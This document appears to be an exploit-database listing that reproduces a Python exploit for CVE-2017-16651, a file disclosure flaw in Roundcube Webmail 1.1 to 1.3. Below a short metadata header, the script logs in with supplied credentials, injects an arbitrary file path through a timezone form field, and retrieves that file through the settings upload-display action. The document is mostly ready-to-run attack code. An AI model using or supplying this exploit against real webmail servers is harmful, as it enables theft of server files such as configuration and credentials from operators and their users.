Exploit for Roundcube Webmail 1.2 File Disclosure CVE-2017-16651

Name: Exploit for Roundcube Webmail 1.2 File Disclosure CVE-2017-16651
Rating: 5 (227 reviews)

2021-02-01 | CVSS 4.6

## https://sploitus.com/exploit?id=PACKETSTORM:161226
# Exploit Title: Roundcube Webmail 1.2 - File Disclosure   
# Date: 09-11-2017  
# Exploit Author: stonepresto  
# Vendor Homepage: https://roundcube.net/  
# Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/  
# Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2  
# Tested on: roundcube version 1.2-beta  
# CVE : CVE-2017-16651  
  
#!/usr/bin/env python3  
# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1  
# https://github.com/stonepresto/CVE-2017-16651  
# Exploit Author: stonepresto  
  
import requests  
import re  
import sys  
  
URL="https://127.0.0.1/"  
USER="user@example.com"  
PASS="password"  
  
def main():  
s = requests.Session()  
r = s.get(URL,params={"_task":"login"},verify=False)  
token = None  
for line in r.text.split("\n"):  
if 'name="_token"' in line:  
token = line.split("value=")[1].split('"')[1]  
print("[+] token: %s" % token)  
if token is None:  
print("[!] unable to retrieve token")  
sys.exit(1)  
  
data = {  
"_token":token,  
"_task":"login",  
"_action":"login",  
"_timezone[files][1][path]":sys.argv[1],  
"_url":"_task%3Dlogin",  
"_user":USER,  
"_pass":PASS  
}  
r = s.post(URL,params={"_task":"login"},data=data,verify=False)  
  
params = {  
"_task":"settings",  
"_action":"upload-display",  
"_from":"timezone",  
"_file":"rcmfile1"  
}  
  
r = s.get(URL,params=params,verify=False)  
print(r.text)  
  
if __name__ == "__main__":  
if len(sys.argv) != 2:  
print("[!] Usage: %s <file-to-read>" % sys.argv[0])  
else:  
main()